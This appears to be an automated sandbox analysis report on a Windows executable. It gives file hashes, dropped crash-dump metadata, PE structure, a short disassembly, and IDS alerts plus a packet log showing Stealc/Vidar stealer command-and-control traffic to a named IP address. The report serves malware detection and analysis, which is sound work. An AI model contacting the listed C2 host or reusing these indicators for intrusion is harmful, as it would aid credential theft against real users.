                                                          SHA-512:03DB0604FC17F9422AAC917388A53DB0D207C4D99A384A863CE25F2C6CC8A57517F34AB87A701B934008E2385DCFF58676B043904CA56E50A13D9BCFABC6D80E
                                                          Malicious:false
                                                          Preview:MDMP..a..... .......m..g........................p................M..........T.......8...........T............8..............\$..........H&..............................................................................eJ.......&......GenuineIntel............T...........Q..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):6302
                                                          Entropy (8bit):3.7214854341088333
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJX26bYbDJwNQiVprP89bJcsfcE4jm:R6lXJG6bYbDJe7YJvfcm
                                                          MD5:59867EDAECECB7FB12CB4307B8070E23
                                                          SHA1:FEEF25A6D54EE30AFE68EED5D958A253251076FB
                                                          SHA-256:961316814753AA8849EAB23FB16DBB13816D745C9AA51CD22ACB1D49D772F7F1
                                                          SHA-512:D1F1EDC08FC642B6CC97C31464800E36BD541268F118198CE76A18963A3EB1B16018E82511E20AE5AF9BDDEA45EF15570FC608AD9209C4264A38F38CACB669E5
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.6.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4642
                                                          Entropy (8bit):4.459540109076187
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsyJg77aI9t6WpW8VY75Ym8M4J0DF6a+q8+ydmL5d:uIjfAI7b77VFJPaImL5d
                                                          MD5:5D84CB0CFB6CA4B2A85736D7AF6119F6
                                                          SHA1:068441620D535EC9E1E4A0AACDE0AB05B2A62A9B
                                                          SHA-256:E228F56127F92696C548A717809BAE9A5AD8190A6191B7508AB26B08961654BA
                                                          SHA-512:E6E673BAA64082C5D885F55F2395BE1F0DC49EF0CA33B069D6E2B62BD6B36A33176B8DF79E417E29318A76525384B2B6098879B3A98C067A149EA414A9BAA6D3
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):1048575
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:w:w
                                                          MD5:5D53C9A2990BE15A29CAF5B633460BD9
                                                          SHA1:369952FD3984103E76D9CCA3F6F01D70333076B1
                                                          SHA-256:93BB5500C5D35D56C01A432B9514D7A0953955531A5ACA8A7D8BDB8543FD20D7
                                                          SHA-512:653198CC1EE9BFFB842CD2342453FBDB1868C352F4368EB9554B9E7131F7AACBCDA4A571C449E20E94A1E8FB565B237192289F135BFDF8294B782C430159CCEA
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.469652544596662
                                                          Encrypted:false
                                                          SSDEEP:6144:FIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uN5dwBCswSbF:mXD94OWlLZMM6YFHT+F
                                                          MD5:86EC46900A0302728E592F4B03CB7305
                                                          SHA1:D8AE3E7DF8F295B06B8BB3E5199EC71D06494318
                                                          SHA-256:594B85DF20D4DE82854B9B5AF80A7EDBE3471A0F29AA391CD60BA210D22CC337
                                                          SHA-512:4B287EF57B7B2E10795280F47774F2604BE7AA5A559DEE56CB2D7E9E1C48B9CEFA8FD33D6BD442F246DBCFD6451791D1FA07C1F479E4FB73AD625CF75DAFD9AF
                                                          Malicious:false
                                                          Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:Y(i................................................................................................................................................................................................................................................................................................................................................D+>]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.746698676013429
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:lCVFGKfczi.exe
                                                          File size:584'704 bytes
                                                          MD5:b84100c670bb19e92bfb62423048aa43
                                                          SHA1:592f3aef7ad93db6527d8e9d06b2ebbae1a51a79
                                                          SHA256:7823532217e8b06b102734023019188833b3e0ae711c3dc6f9cb437d8c48d14b
                                                          SHA512:25610d8053a29ef458a690e1435008cbdfd990e2548dbad0db929e539a594c61c144f0025f4b74788324d507af37c66dde302ba513f5279d4f2b37ec5ab8a953
                                                          SSDEEP:12288:HcEcpXoWDMr3QZJG6/vrB7JOpf/4Xx8Yl6E0nfhLZ4S:HOXo5Q/vXipYXx3l65ntK
                                                          TLSH:01C4F11171C0C077D9B7153256E19A78AE3DB8B00E61AD9F6B950F7F4F30181EB21AAB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............
                                                          Icon Hash:90cececece8e8eb0
                                                          Entrypoint:0x406f52
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x670409F6 [Mon Oct 7 16:19:02 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:d10af643340e1121562abe3e6bd5b0e1
                                                          Instruction
                                                          call 00007FD760B9B110h
                                                          jmp 00007FD760B9A67Fh
                                                          push ebp
                                                          mov ebp, esp
                                                          mov eax, dword ptr [ebp+08h]
                                                          push esi
                                                          mov ecx, dword ptr [eax+3Ch]
                                                          add ecx, eax
                                                          movzx eax, word ptr [ecx+14h]
                                                          lea edx, dword ptr [ecx+18h]
                                                          add edx, eax
                                                          movzx eax, word ptr [ecx+06h]
                                                          imul esi, eax, 28h
                                                          add esi, edx
                                                          cmp edx, esi
                                                          je 00007FD760B9A81Bh
                                                          mov ecx, dword ptr [ebp+0Ch]
                                                          cmp ecx, dword ptr [edx+0Ch]
                                                          jc 00007FD760B9A80Ch
                                                          mov eax, dword ptr [edx+08h]
                                                          add eax, dword ptr [edx+0Ch]
                                                          cmp ecx, eax
                                                          jc 00007FD760B9A80Eh
                                                          add edx, 28h
                                                          cmp edx, esi
                                                          jne 00007FD760B9A7ECh
                                                          xor eax, eax
                                                          pop esi
                                                          pop ebp
                                                          ret
                                                          mov eax, edx
                                                          jmp 00007FD760B9A7FBh
                                                          push esi
                                                          call 00007FD760B9B424h
                                                          test eax, eax
                                                          je 00007FD760B9A822h
                                                          mov eax, dword ptr fs:[00000018h]
                                                          mov esi, 0048E944h
                                                          mov edx, dword ptr [eax+04h]
                                                          jmp 00007FD760B9A806h
                                                          cmp edx, eax
                                                          je 00007FD760B9A812h
                                                          xor eax, eax
                                                          mov ecx, edx
                                                          lock cmpxchg dword ptr [esi], ecx
                                                          test eax, eax
                                                          jne 00007FD760B9A7F2h
                                                          xor al, al
                                                          pop esi
                                                          ret
                                                          mov al, 01h
                                                          pop esi
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+08h], 00000000h
                                                          jne 00007FD760B9A809h
                                                          mov byte ptr [0048E948h], 00000001h
                                                          call 00007FD760B9AABAh
                                                          call 00007FD760B9D9D7h
                                                          test al, al
                                                          jne 00007FD760B9A806h
                                                          xor al, al
                                                          pop ebp
                                                          ret
                                                          call 00007FD760BA6439h
                                                          test al, al
                                                          jne 00007FD760B9A80Ch
                                                          push 00000000h
                                                          call 00007FD760B9D9DEh
                                                          pop ecx
                                                          jmp 00007FD760B9A7EBh
                                                          mov al, 01h
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp byte ptr [0048E949h], 00000000h
                                                          je 00007FD760B9A806h
                                                          mov al, 01h
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2c6c00x28.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x3d8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x1acc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x2abc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ab000x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x230000x12c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x210f00x21200da6933d9163c91b410d0c575582c5aeeFalse0.5865197523584905data6.664966733928765IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x230000x9d780x9e0065c30f2171d22472fa06dae333a28d71False0.4352007515822785data4.9601306801628615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x2d0000x625700x61800a9188688ff3a2e1ca1a0cf02772126a3False0.9919471153846153DOS executable (block device driver \377\377\377\377,32-bit sector-support)7.993070911581116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x900000x3d80x400af649139f3e8354e0bee38868a95abf6False0.439453125data3.276619243827775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x910000x1acc0x1c00c3d526dfd91d01742bffceba6eaa40c5False0.7260044642857143data6.386834799905597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x900580x380dataEnglishUnited States0.46205357142857145
                                                          DLLImport
                                                          KERNEL32.dllAttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-07T18:46:10.427105+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1195.164.90.9780192.168.2.449743TCP
                                                          2024-10-07T18:46:34.937813+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.44974395.164.90.9780TCP
                                                          2024-10-07T18:46:35.930186+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config195.164.90.9780192.168.2.449743TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2024 18:46:13.131978035 CEST49675443192.168.2.4173.222.162.32
                                                          Oct 7, 2024 18:46:32.458460093 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:32.463567972 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:32.463660002 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:32.463808060 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:32.469723940 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:33.638705015 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:33.638782978 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:33.642240047 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:33.649979115 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:34.275516033 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:34.275593996 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:34.276621103 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:34.282388926 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:34.937433958 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:34.937813044 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:34.937990904 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:34.938055038 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:34.939420938 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:34.945060968 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929681063 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929750919 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929760933 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929873943 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.929874897 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.929874897 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.929909945 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929923058 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929944992 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.929981947 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.929981947 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.929981947 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.930186033 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.930244923 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.930454969 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.930502892 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.931319952 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.936810017 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.936852932 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.936862946 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.936878920 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.936913013 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.937052011 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.937107086 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.937391043 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:35.937446117 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:35.939052105 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:36.578031063 CEST804974395.164.90.97192.168.2.4
                                                          Oct 7, 2024 18:46:36.578136921 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:41.503042936 CEST4974380192.168.2.495.164.90.97
                                                          Oct 7, 2024 18:46:45.796947002 CEST8049724217.20.57.23192.168.2.4
                                                          Oct 7, 2024 18:46:45.797116041 CEST4972480192.168.2.4217.20.57.23
                                                          Oct 7, 2024 18:46:45.797236919 CEST4972480192.168.2.4217.20.57.23
                                                          Oct 7, 2024 18:46:45.802237034 CEST8049724217.20.57.23192.168.2.4
                                                          Oct 7, 2024 18:47:07.239291906 CEST49747443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.239326954 CEST4434974713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:07.239413977 CEST49747443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.239712000 CEST49747443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.239728928 CEST4434974713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:07.313772917 CEST4434974713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:07.316077948 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.316104889 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:07.316181898 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.316668987 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:07.316679001 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.115036011 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.115211964 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.118674040 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.118702888 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.118994951 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.126542091 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.171402931 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.232496977 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.232531071 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.232552052 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.232634068 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.232656956 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.232722044 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.316797972 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.316834927 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.316900969 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.316931963 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.316956043 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.316983938 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.321249962 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.321274042 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.321331024 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.321351051 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.321377993 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.321403027 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.403393984 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.403430939 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.403660059 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.403681040 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.403736115 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.405711889 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.405735970 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.405802011 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.405814886 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.405860901 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.407406092 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.407428980 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.407489061 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.407497883 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.407543898 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.447652102 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.447685957 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.447766066 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.447792053 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.447818041 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.447845936 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.505852938 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.505886078 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.506000042 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.506030083 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.506086111 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.508203983 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.508228064 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.508290052 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.508302927 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.508341074 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.508373022 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.510092020 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.510117054 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.510169029 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.510179043 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.510216951 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.510241032 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.512566090 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.512590885 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.512659073 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.512669086 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.512717009 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.514379025 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.514403105 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.514463902 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.514472961 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.514523029 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.515913963 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.515938997 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.515988111 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.516012907 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.516021013 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.516062021 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.516062975 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.516110897 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.516319036 CEST49748443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:08.516345978 CEST4434974813.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:08.516357899 CEST49748443192.168.2.413.107.246.45
